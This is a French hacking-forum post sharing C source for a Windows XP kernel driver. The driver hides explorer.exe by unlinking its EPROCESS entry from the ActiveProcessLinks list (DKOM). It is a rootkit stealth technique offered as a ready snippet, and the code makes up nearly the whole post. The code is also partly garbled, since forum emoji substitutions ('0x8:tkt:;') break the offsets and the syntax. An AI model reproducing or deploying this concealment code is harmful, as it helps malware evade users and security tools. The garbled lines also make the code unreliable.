• Bienvenue à tous sur HackandModz !
  1. Ce site utilise des cookies. En continuant à utiliser ce site, vous acceptez l'utilisation des cookies. En savoir plus.
Rejeter la notice
Visiteur,
Bienvenue sur Hack & Modz

- Cacher Un Process En Ring0 Avec Dkom

Discussion dans 'C++' créé par HerO0z, Jan 16, 2015.

  1. HerO0z

    HerO0z Nouveau membre

    87
    13
    8
    Hors Ligne
    [​IMG]

    #codé par Xash
    #snippet only

    Ce snippet permet de cacher un processus (ici explorer.exe) sous winXP avec la manipulation directe d'objet via le kernel, le DKOM (Direct Kernel Object Manipulation).

    Code :
    #include <ntddk.h>
    #include <string.h>

    typedef unsigned long DWORD;
    typedef DWORD* PDWORD;

    VOID unload(PDRIVER_OBJECT pDriverObject) {
    DbgPrint("[-] Oh no :'(\n");
    }

    NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath) {
    PEPROCESS currentProcess;
    PEPROCESS nextProcess;
    PLIST_ENTRY listProcess;

    pDriverObject->DriverUnload = unload;
    DbgPrint("[+] The devil is in your kernel!\n");

    currentProcess = IoGetCurrentProcess();
    nextProcess = currentProcess;

    do {
    DbgPrint("- %s\n", (PUCHAR)((PUCHAR)nextProcess + 0x174)); // +0x174 ImageFileName : [16] UChar
    listProcess = (PLIST_ENTRY)((PUCHAR)nextProcess + 0x8:tkt:; // +0x088 ActiveProcessLinks : _LIST_ENTRY

    if (strcmp((PUCHAR)((PUCHAR)nextProcess + 0x174), "explorer.exe") == 0) {
    // +0x000 Flink
    // +0x004 Blink
    // => Flink + 1 = Blink of the next member
    *((PDWORD) listProcess->Flink + 1) = (DWORD) listProcess->Blink;
    *((PDWORD) listProcess->Blink) = (DWORD) listProcess->Flink; // Blink = Flink of the previous member

    DbgPrint("explorer.exe is now like a ninja");
    }

    nextProcess = (PEPROCESS) listProcess->Flink;
    nextProcess = (PEPROCESS)((PUCHAR)nextProcess - 0x8:tkt:; // ActiveProcessLinks->Flink jump on "ActiveProcessLinks" in the next process
    } while (nextProcess != currentProcess);

    return STATUS_SUCCESS;
    }